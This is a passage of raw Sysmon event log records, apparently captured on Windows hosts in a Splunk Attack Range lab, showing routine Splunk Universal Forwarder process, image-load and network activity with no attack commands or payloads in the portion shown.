AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FFC4AB3C483A794D731770C55D37289,SHA256=10E01F0CA41955EE3539D0CB60611EC5305841B59841AAF9694F618B10DEA9B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:16.589{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49413-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-170B-6216-1807-000000003802}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-170B-6216-1807-000000003802}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.982{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-170B-6216-1807-000000003802}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.983{C8EA50B7-170B-6216-1807-000000003802}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22B668CA52B08840A3801D6594D193F7,SHA256=7E05FAD17B02A7A3545D52A6A3B2F69AB4E728039F435FB7D545E56952F4463D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:19.687{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1CE23CEC70E8E7EDB48DAF130E0DB95,SHA256=83124437A829C2A3ACD5F57D4458BB6670F38713E64F6045C3453A480BD907B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:17.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51618-false10.0.1.12-8000- 10341000x8000000000000000297044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.598{C8EA50B7-170B-6216-1707-000000003802}68766952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.320{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-170B-6216-1707-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.318{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.318{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.317{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.317{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-170B-6216-1707-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.317{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.316{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-170B-6216-1707-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:19.315{C8EA50B7-170B-6216-1707-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:20.702{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8288AEA4E0A0549E7EA62556DF55C53A,SHA256=07A55FF6F9A0EFB471A8644411171DFA076B6D96554C5EC5F3DE16819CCDC51D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.881{C8EA50B7-170C-6216-1907-000000003802}52926620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.718{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5DF21E4166D3B1314FCB07EBB8307C9,SHA256=17802ACD2BE840999BA1BA7A8E033192212FF5460D1CD22C0F221EF619C1E139,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-170C-6216-1907-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-170C-6216-1907-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.650{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-170C-6216-1907-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 